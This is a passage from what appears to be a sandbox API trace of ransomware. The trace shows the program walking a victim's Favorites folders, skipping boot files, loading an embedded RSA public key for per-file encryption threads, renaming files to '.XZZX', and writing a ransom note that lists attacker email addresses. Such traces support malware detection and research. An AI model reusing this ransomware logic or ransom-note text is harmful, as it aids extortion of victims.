lpSrch="NTLDR") returned 0x0 [0237.937] StrStrW (lpFirst="FD9030E848C62D90344A51E94CDE11D8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0237.937] StrStrW (lpFirst="FD9030E848C62D90344A51E94CDE11D8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0237.937] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0237.937] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0237.937] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 63 [0237.937] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0237.937] lstrcpyW (in: lpString1=0x17be7c, lpString2="FD9030E848C62D90344A51E94CDE11D8.XZZX" | out: lpString1="FD9030E848C62D90344A51E94CDE11D8.XZZX") returned="FD9030E848C62D90344A51E94CDE11D8.XZZX" [0237.937] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0237.937] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1230 [0237.937] Sleep (dwMilliseconds=0x96) [0238.092] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0238.092] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0238.092] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0238.092] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0238.093] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0238.093] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 1 [0238.093] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 0 [0238.093] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0238.093] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*" [0238.093] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0238.093] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0238.093] SetErrorMode (uMode=0x1) returned 0x1 [0238.093] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\_HELP_INSTRUCTION.TXT") returned 80 [0238.093] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0238.093] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0238.094] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x1234) returned 0x0 [0238.094] RegQueryValueExW (in: hKey=0x1234, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43dbf50, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43dbf50*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0238.094] RegCloseKey (hKey=0x1234) returned 0x0 [0238.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0238.094] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0238.094] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1234 [0238.094] CloseHandle (hObject=0x1234) returned 1 [0238.094] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0238.094] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="Microsoft Websites" [0238.094] lstrcpyW (in: lpString1=0x17b644, lpString2="Microsoft Websites" | out: lpString1="Microsoft Websites") returned="Microsoft Websites" [0238.094] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0238.095] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0238.095] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="MSN Websites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0238.095] SetErrorMode (uMode=0x1) returned 0x1 [0238.095] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0238.095] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0238.095] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0238.095] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*" [0238.095] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0238.095] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="MSN Websites" [0238.095] lstrcpyW (in: lpString1=0x17b644, lpString2="MSN Websites" | out: lpString1="MSN Websites") returned="MSN Websites" [0238.095] StrStrW (lpFirst="13771DB6235C0ADD78BD03922773EF25.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0238.095] StrStrW (lpFirst="13771DB6235C0ADD78BD03922773EF25.XZZX", lpSrch="ntldr") returned 0x0 [0238.095] StrStrW (lpFirst="13771DB6235C0ADD78BD03922773EF25.XZZX", lpSrch="NTLDR") returned 0x0 [0238.095] StrStrW (lpFirst="13771DB6235C0ADD78BD03922773EF25.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0238.095] StrStrW (lpFirst="13771DB6235C0ADD78BD03922773EF25.XZZX", lpSrch="ntdetect.com") returned 0x0 [0238.095] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0238.095] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0238.095] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 57 [0238.095] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0238.095] lstrcpyW (in: lpString1=0x17be7c, lpString2="13771DB6235C0ADD78BD03922773EF25.XZZX" | out: lpString1="13771DB6235C0ADD78BD03922773EF25.XZZX") returned="13771DB6235C0ADD78BD03922773EF25.XZZX" [0238.095] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0238.095] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x123c [0238.096] Sleep (dwMilliseconds=0x96) [0238.248] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0238.248] lstrcmpW (lpString1="583CA788134302604AF8FA2E175AE6A8.XZZX", lpString2="..") returned 1 [0238.248] lstrcmpW (lpString1="583CA788134302604AF8FA2E175AE6A8.XZZX", lpString2=".") returned 1 [0238.248] StrStrW (lpFirst="583CA788134302604AF8FA2E175AE6A8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0238.248] StrStrW (lpFirst="583CA788134302604AF8FA2E175AE6A8.XZZX", lpSrch="ntldr") returned 0x0 [0238.248] StrStrW (lpFirst="583CA788134302604AF8FA2E175AE6A8.XZZX", lpSrch="NTLDR") returned 0x0 [0238.249] StrStrW (lpFirst="583CA788134302604AF8FA2E175AE6A8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0238.249] StrStrW (lpFirst="583CA788134302604AF8FA2E175AE6A8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0238.249] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0238.249] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0238.249] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 57 [0238.249] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0238.249] lstrcpyW (in: lpString1=0x17be7c, lpString2="583CA788134302604AF8FA2E175AE6A8.XZZX" | out: lpString1="583CA788134302604AF8FA2E175AE6A8.XZZX") returned="583CA788134302604AF8FA2E175AE6A8.XZZX" [0238.249] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0238.249] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1240 [0238.249] Sleep (dwMilliseconds=0x96) [0238.404] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0238.404] lstrcmpW (lpString1="833DF956476C97EAEAF8AD0B4B847C32.XZZX", lpString2="..") returned 1 [0238.405] lstrcmpW (lpString1="833DF956476C97EAEAF8AD0B4B847C32.XZZX", lpString2=".") returned 1 [0238.405] StrStrW (lpFirst="833DF956476C97EAEAF8AD0B4B847C32.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0238.405] StrStrW (lpFirst="833DF956476C97EAEAF8AD0B4B847C32.XZZX", lpSrch="ntldr") returned 0x0 [0238.405] StrStrW (lpFirst="833DF956476C97EAEAF8AD0B4B847C32.XZZX", lpSrch="NTLDR") returned 0x0 [0238.405] StrStrW (lpFirst="833DF956476C97EAEAF8AD0B4B847C32.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0238.405] StrStrW (lpFirst="833DF956476C97EAEAF8AD0B4B847C32.XZZX", lpSrch="ntdetect.com") returned 0x0 [0238.405] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0238.405] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0238.405] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 57 [0238.405] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0238.405] lstrcpyW (in: lpString1=0x17be7c, lpString2="833DF956476C97EAEAF8AD0B4B847C32.XZZX" | out: lpString1="833DF956476C97EAEAF8AD0B4B847C32.XZZX") returned="833DF956476C97EAEAF8AD0B4B847C32.XZZX" [0238.405] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0238.405] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1244 [0238.405] Sleep (dwMilliseconds=0x96) [0238.560] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0238.560] lstrcmpW (lpString1="880F5E93248AC126C0E08BB728B7A56E.XZZX", lpString2="..") returned 1 [0238.561] lstrcmpW (lpString1="880F5E93248AC126C0E08BB728B7A56E.XZZX", lpString2=".") returned 1 [0238.561] StrStrW (lpFirst="880F5E93248AC126C0E08BB728B7A56E.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0238.561] StrStrW (lpFirst="880F5E93248AC126C0E08BB728B7A56E.XZZX", lpSrch="ntldr") returned 0x0 [0238.561] StrStrW (lpFirst="880F5E93248AC126C0E08BB728B7A56E.XZZX", lpSrch="NTLDR") returned 0x0 [0238.561] StrStrW (lpFirst="880F5E93248AC126C0E08BB728B7A56E.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0238.561] StrStrW (lpFirst="880F5E93248AC126C0E08BB728B7A56E.XZZX", lpSrch="ntdetect.com") returned 0x0 [0238.561] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0238.561] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0238.561] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 57 [0238.561] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0238.561] lstrcpyW (in: lpString1=0x17be7c, lpString2="880F5E93248AC126C0E08BB728B7A56E.XZZX" | out: lpString1="880F5E93248AC126C0E08BB728B7A56E.XZZX") returned="880F5E93248AC126C0E08BB728B7A56E.XZZX" [0238.561] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0238.561] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1248 [0238.561] Sleep (dwMilliseconds=0x96) [0238.716] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0238.717] lstrcmpW (lpString1="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX", lpString2="..") returned 1 [0238.717] lstrcmpW (lpString1="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX", lpString2=".") returned 1 [0238.717] StrStrW (lpFirst="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0238.717] StrStrW (lpFirst="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX", lpSrch="ntldr") returned 0x0 [0238.717] StrStrW (lpFirst="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX", lpSrch="NTLDR") returned 0x0 [0238.717] StrStrW (lpFirst="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0238.717] StrStrW (lpFirst="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX", lpSrch="ntdetect.com") returned 0x0 [0238.717] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0238.717] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0238.717] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 57 [0238.717] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- 